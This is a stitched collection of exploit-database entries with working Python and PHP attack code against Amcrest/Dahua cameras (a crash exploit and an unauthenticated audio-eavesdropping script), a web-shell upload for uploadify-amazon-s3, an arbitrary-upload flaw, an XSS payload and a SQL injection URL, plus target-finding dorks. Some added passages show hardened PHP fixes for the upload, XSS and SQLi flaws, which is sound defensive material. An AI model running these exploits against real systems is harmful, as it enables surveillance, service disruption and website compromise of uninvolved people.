# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5
# 4.000.00AC000.0
# CVE : CVE-2020-5735
# Advisory: https://www.tenable.com/security/research/tra-2020-20
# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash
import argparse
import hashlib
import socket
import struct
import sys
import md5
import re

## DDNS test functionality. Stack overflow via memcpy
def recv_response(sock):
    # minimum size is 32 bytes
    header = sock.recv(32)
    # check we received enough data
    if len(header) != 32:
        print 'Invalid response. Too short'
        return (False, '', '')
    # extract the payload length field
    length_field = header[4:8]
    payload_length = struct.unpack_from('I', length_field)
    payload_length = payload_length[0]
    # uhm... lets be restrictive of accepted lengths
    if payload_length < 0 or payload_length > 4096:
        print 'Invalid response. Bad payload length'
        return (False, header, '')
    if (payload_length == 0):
        return (True, header, '')
    payload = sock.recv(payload_length)
    if len(payload) != payload_length:
        print 'Invalid response. Bad received length'
        return (False, header, payload)
    return (True, header, payload)

def sofia_hash(msg):
    h = ""
    m = hashlib.md5()
    m.update(msg)
    msg_md5 = m.digest()
    for i in range(8):
        n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
        if n > 9:
            if n > 35:
                n += 61
            else:
                n += 55
        else:
            n += 0x30
        h += chr(n)
    return h

top_parser = argparse.ArgumentParser(description='lol')
top_parser.add_argument('-i', '--ip', action="store", dest="ip",
                        required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port",
                        type=int, help="The port to connect to", default="37777")
top_parser.add_argument('-u', '--username', action="store",
                        dest="username", help="The user to login as", default="admin")
top_parser.add_argument('--pass', action="store", dest="password",
                        required=True, help="The password to use")
args = top_parser.parse_args()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"

# send the old style login request. We'll use blank hashes. This should
# trigger a challenge from new versions of the camera
old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" +
             "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash
             "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash
             "\x05\x02\x00\x01\x00\x00\xa1\xaa")
sock.sendall(old_login)

(success, header, challenge) = recv_response(sock)
if success == False or not challenge:
    print 'Failed to receive the challenge'
    print challenge
    sys.exit(0)

# extract the realm and random seed
seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n",
                  challenge)
if seeds == None:
    print 'Failed to extract realm and random seed.'
    print challenge
    sys.exit(0)

realm = seeds.group(1)
random = seeds.group(2)

# compute the response
realm_hash = md5.new(args.username + ":" + realm + ":" +
                     args.password).hexdigest().upper()
random_hash = md5.new(args.username + ":" + random + ":" +
                      realm_hash).hexdigest().upper()
sofia_result = sofia_hash(args.password)
final_hash = md5.new(args.username + ":" + random + ":" +
                     sofia_result).hexdigest().upper()

challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" +
                  "\x00\x00\x00\x00\x00\x00\x00\x00" +
                  "\x00\x00\x00\x00\x00\x00\x00\x00" +
                  "\x05\x02\x00\x08\x00\x00\xa1\xaa" +
                  args.username + "&&" + random_hash + final_hash)
sock.sendall(challenge_resp)

(success, header, payload) = recv_response(sock)
if success == False or not header:
    print 'Failed to receive the session id'
    sys.exit(0)

session_id_bin = header[16:20]
session_id_int = struct.unpack_from('I', session_id_bin)
if session_id_int[0] == 0:
    print "Log in failed."
    sys.exit(0)

session_id = session_id_int[0]
print "[+] Session ID: " + str(session_id)

# firmware version
command = "Protocol: " + ("a" * 0x300) + "\r\n"
command_length = struct.pack("I", len(command))
firmware = ("\x62\x00\x00\x00" + command_length +
            "\x04\x00\x00\x00\x00\x00\x00\x00" +
            "\x00\x00\x00\x00\x00\x00\x00\x00" +
            "\x00\x00\x00\x00\x00\x00\x00\x00" +
            command)
sock.sendall(firmware)

(success, header, firmware_string) = recv_response(sock)
if success == False and not header:
    print "[!] Probably crashed the server."
else:
    print "[+] Attack failed."
##
# Exploit Title: Unauthenticated Audio Streaming from Amcrest Camera
# Shodan Dork: html:"@WebVersion@"
# Date: 08/29/2019
# Exploit Author: Jacob Baines
# Vendor Homepage: https://amcrest.com/
# Software Link: https://amcrest.com/firmwaredownloads
# Affected Version: V2.520.AC00.18.R
# Fixed Version: V2.420.AC00.18.R
# Tested on: Tested on Amcrest IP2M-841 but known to affect other Dahua devices.
# CVE : CVE-2019-3948
# Disclosure: https://www.tenable.com/security/research/tra-2019-36
# Disclosure: https://sup-files.s3.us-east-2.amazonaws.com/Firmware/IP2M-841/JS+IP2M-841/Changelog/841_721_HX1_changelog_20190729.txt
#
# To decode the scripts output using ffplay use:
# ffplay -f alaw -ar 8k -ac 1 [poc output]
# Note that this assumes the camera is using the default encoding options.
##
import argparse
import socket
import struct
import sys
##
# Read in the specified amount of data, looping until it has all arrived.
# If the peer closes the connection first, raise instead of spinning forever
# on empty recv() results.
#
# @return the data we read in
##
def recv_all(sock, amount):
    data = ''
    while len(data) != amount:
        temp_data = sock.recv(amount - len(data))
        if not temp_data:
            # recv() returning '' means the remote side closed the connection
            raise IOError('connection closed after %d of %d bytes' % (len(data), amount))
        data = data + temp_data
    return data

top_parser = argparse.ArgumentParser(description='Download audio from the HTTP videotalk endpoint')
top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="80")
top_parser.add_argument('-o', '--output', action="store", dest="output", help="The file to write the audio to")
top_parser.add_argument('-b', '--bytes', action="store", dest="bytes", type=int, help="The amount of audio to download", default="1048576")
args = top_parser.parse_args()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(True)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"

request = ('GET /videotalk HTTP/1.1\r\n' +
           'Host: ' + args.ip + ':' + str(args.port) + '\r\n' +
           'Range: bytes=0-\r\n' +
           '\r\n')
sock.sendall(request)

status = ''
header = ''
# read in the HTTP response. Store the status.
while (header != '\r\n'):
    header = header + sock.recv(1)
    if (header.find('\r\n') > 0):
        header = header.strip()
        if (len(status) == 0):
            status = header
        header = ''

if (status.find('200 OK') == -1):
    print '[-] Bad HTTP status. We received: "' + status + '"'
    sock.close()
    exit()
else:
    print '[+] Downloading ' + str(args.bytes) + ' bytes of audio ...'

total_audio = ''
while (len(total_audio) < args.bytes):
    # read in the header length
    header_length = recv_all(sock, 4)
    hlength = struct.unpack("I", header_length)[0]
    if (hlength != 36):
        print '[-] Unexpected header length'
        sock.close()
        exit()
    # read in the header and extract the payload length
    header = recv_all(sock, hlength)
    plength = struct.unpack_from(">H", header)[0]
    if (plength != 368):
        print '[-] Unexpected payload length'
        sock.close()
        exit()
    # there is a seq no in the header but since this is over
    # tcp is sort of useless.
    dhav = header[2:6]
    if (dhav != "DHAV"):
        print '[-] Invalid header'
        sock.close()
        exit()
    # extract the audio. I'm really not sure what the first 6 bytes are
    # but the last 8 serve as a type of trailer
    whatami = recv_all(sock, 6)
    audio = recv_all(sock, plength - hlength - 12)
    trailer = recv_all(sock, 8)
    if (trailer != 'dhavp\x01\x00\x00'):
        print '[-] Invalid end of frame'
        sock.close()
        exit()
    total_audio = total_audio + audio
    sys.stdout.write('\r' + str(len(total_audio)) + " / " + str(args.bytes))
    sys.stdout.flush()

print ''
print '[+] Finished receiving audio.'
print '[+] Closing socket'
out_file = open(args.output, 'wb')
out_file.write(total_audio)
out_file.close()
sock.close()
# # # # #
# Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://mojoomla.com/
# Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703
# Demo: http://dasinfomedia.com.au/php/amc/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows users to upload arbitrary files: the uploaded file is moved into the web root under its client-supplied name without any validation.
#
# Vulnerable Source:
#
# if(isset($id)){
# $user_d=$this->request->data;
# $this->row_update=$this->table_user->get($id);
# $this->set('emp_update_row',$this->row_update);
#
# if($this->request->is(['post','put'])){
#
# $get_output=$this->check_update_email($this->row_update,$this->request->data('email'));
#
# if($get_output == true){
#
# if(isset($_FILES['image']['name']) && !empty($_FILES['image']['name'])){
# move_uploaded_file($_FILES['image']['tmp_name'],$this->user_image.$_FILES['image']['name']);
# $this->store_image=$_FILES['image']['name'];
# }else{
# $this->store_image=$this->request->data('old_image');
# }
#
# Proof of Concept:
#
# http://localhost/[PATH]/account/profilesetting/[ID]
# http://localhost/[PATH]/img/user/[FILE]
#
# Etc..
# # # # #
source: https://www.securityfocus.com/bid/54170/info
Amazon S3 Uploadify Script is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Amazon S3 Uploadify Script 1.01 is vulnerable; other versions may also be affected.
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
#########################################
I'm Sammy FORGIT member from Inj3ct0r Team
#########################################
##################################################
# Description : uploadify-amazon-s3 Arbitrary File Upload Vulnerability
# Version : 1.01
# Link : http://code.google.com/p/uploadify-amazon-s3/
# Software : http://code.google.com/p/uploadify-amazon-s3/downloads/detail?name=uploadify-amazon-s3-101.zip&can=2&q=
# Date : 21-06-2012
# Google Dork : inurl:/files/uploadify/ -google
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/files/uploadify/uploadify.php?folder=/files/uploadify/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/files/uploadify/lo.php
lo.php
<?php
phpinfo();
?>
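Both the AMC profile-image snippet above and the uploadify handler targeted by this exploit hand a client-supplied file name straight to move_uploaded_file(), which is what lets a .php file land in the web root. The following is an added example of a hardened replacement, not code from either project; the function name store_profile_image(), the 2 MiB size cap and the directory argument are choices made here for illustration.

```php
<?php
// Added example: a hardened replacement for the user-controlled
// move_uploaded_file() pattern. Names and limits are illustrative
// assumptions, not the product's own code.

declare(strict_types=1);

/**
 * Store an uploaded image under a server-generated name.
 * Returns the stored file name, or throws on any validation failure.
 */
function store_profile_image(array $file, string $upload_dir): string
{
    // 1. Only accept a file that really came through the PHP upload machinery.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or no file sent');
    }
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if (($file['size'] ?? 0) > 2 * 1024 * 1024) {   // 2 MiB cap for a profile picture
        throw new RuntimeException('file too large');
    }

    // 2. Decide the type from the bytes, never from the client-supplied name
    //    or the client-supplied Content-Type.
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $mime    = $finfo->file($file['tmp_name']);
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('unsupported image type ' . $mime);
    }
    // getimagesize() rejects files that are not a parseable image at all.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('file is not a valid image');
    }

    // 3. Server-chosen name: random, fixed extension, so neither "../" nor
    //    a .php suffix from the client can ever reach the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($upload_dir, '/') . '/' . $name;

    // 4. Move it and drop the execute bit. The directory itself should also
    //    have script execution disabled or live outside the web root.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    return $name;
}

// Usage in the profile-update path of the vulnerable snippet above
// (assumed property name, mirroring $this->user_image in that snippet):
//
// if (!empty($_FILES['image']['name'])) {
//     $this->store_image = store_profile_image($_FILES['image'], $this->user_image);
// } else {
//     $this->store_image = $this->request->data('old_image');
// }
```

The two checks that matter most are deciding the file type from its bytes rather than from the name, and discarding the client name entirely; the remaining steps (size cap, execute bit, a non-executable upload directory) limit what an attacker gains if one of those checks is ever bypassed.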
# Exploit Title: AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)
# Date: 17/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: CodeThemes
# Vendor Homepage: https://spondonit.com/
# Software Link: https://codecanyon.net/item/amazcart-laravel-ecommerce-system-cms/34962179
# Version: 3.4
# Tested on: Live Demo
# Demo Link : https://amazy.rishfa.com/
# Description #
AmazCart - Laravel Ecommerce System CMS 3.4 is vulnerable to reflected
cross-site scripting because user-supplied data is not sufficiently
sanitized. Anyone can submit a reflected XSS payload without logging in
by searching for a product in the search bar. The application reflects
the payload in the frontend search bar, and it fires every time the
search history is viewed.
# Proof of Concept (PoC) : Exploit #
1) Goto: https://amazy.rishfa.com/
2) Enter the following payload in the 'Search Item' box:
"><script>alert(1)</script>
3) An alert popup showing "1" appears
4) The reflected XSS payload has fired
# Image PoC : Reference Image #
1) Payload Fired: https://prnt.sc/QQaiZB3tFMVB
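The payload above works because the search term is echoed back inside the value attribute of the search input, so the leading `"` closes the attribute and `>` closes the tag. The following added example (not AmazCart's code) shows the unencoded reflection beside the encoded one; render_search_box() and the markup it emits are assumptions for illustration.

```php
<?php
// Added example (not AmazCart's own code): encoding a user-supplied search
// term before it is reflected into HTML. The function and markup are
// illustrative assumptions.

declare(strict_types=1);

/** Encode for an HTML text node or a double-quoted attribute value. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * The search bar reflects the term twice: inside the input's value attribute
 * and in the "results for ..." heading. Both contexts must be encoded.
 */
function render_search_box(string $query): string
{
    return '<input type="text" name="q" value="' . h($query) . '">' . "\n"
         . '<h2>Results for ' . h($query) . '</h2>';
}

// The payload from the PoC above (constructed input for the demo)
$payload = '"><script>alert(1)</script>';

// Vulnerable: the quote closes the attribute and the script tag becomes live markup.
echo '<input type="text" name="q" value="' . $payload . '">', "\n";

// Hardened: the same term is rendered as inert text in both contexts.
echo render_search_box($payload), "\n";
```

In a Laravel Blade template the same distinction is between `{{ $query }}`, which applies this encoding automatically, and `{!! $query !!}`, which emits the raw value and must never be used for user input.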
source: https://www.securityfocus.com/bid/56110/info
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
http://www.example.com/path_gallery/plist.php?albumid=[SQLi]
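The albumid parameter is interpolated into a query, which is the root of the SQL injection. The following added example (not the gallery's own code) fetches album pictures with a bound parameter and an integer check instead; the table and column names, and the in-memory SQLite data it runs against, are constructed for illustration.

```php
<?php
// Added example (not the gallery's own code): handling an albumid query
// parameter with validation plus a bound parameter. Table and column
// names are assumptions; the sample data is constructed for the demo.

declare(strict_types=1);

function fetch_album_pictures(PDO $db, string $raw_album_id): array
{
    // Reject anything that is not a plain positive integer before it gets near SQL.
    $album_id = filter_var($raw_album_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($album_id === false) {
        throw new InvalidArgumentException('albumid must be a positive integer');
    }
    // The value travels as a bound parameter; it is never part of the SQL text.
    $stmt = $db->prepare('SELECT id, filename, caption FROM pictures WHERE albumid = :albumid');
    $stmt->bindValue(':albumid', $album_id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-contained demo against an in-memory SQLite database (constructed data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pictures (id INTEGER PRIMARY KEY, albumid INTEGER, filename TEXT, caption TEXT)');
$db->exec("INSERT INTO pictures (albumid, filename, caption) VALUES (1, 'a.jpg', 'first'), (2, 'b.jpg', 'second')");

// A well-formed request returns only album 1.
print_r(fetch_album_pictures($db, '1'));

// Injection-shaped input never reaches the database; it fails the integer check.
try {
    fetch_album_pictures($db, '1 OR 1=1');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The prepared statement alone already prevents injection; the integer validation on top of it gives a clean error for malformed input and keeps the parameter's type explicit, which also closes the door on the same value being reused unsafely elsewhere (for example in the file-disclosure path the advisory mentions).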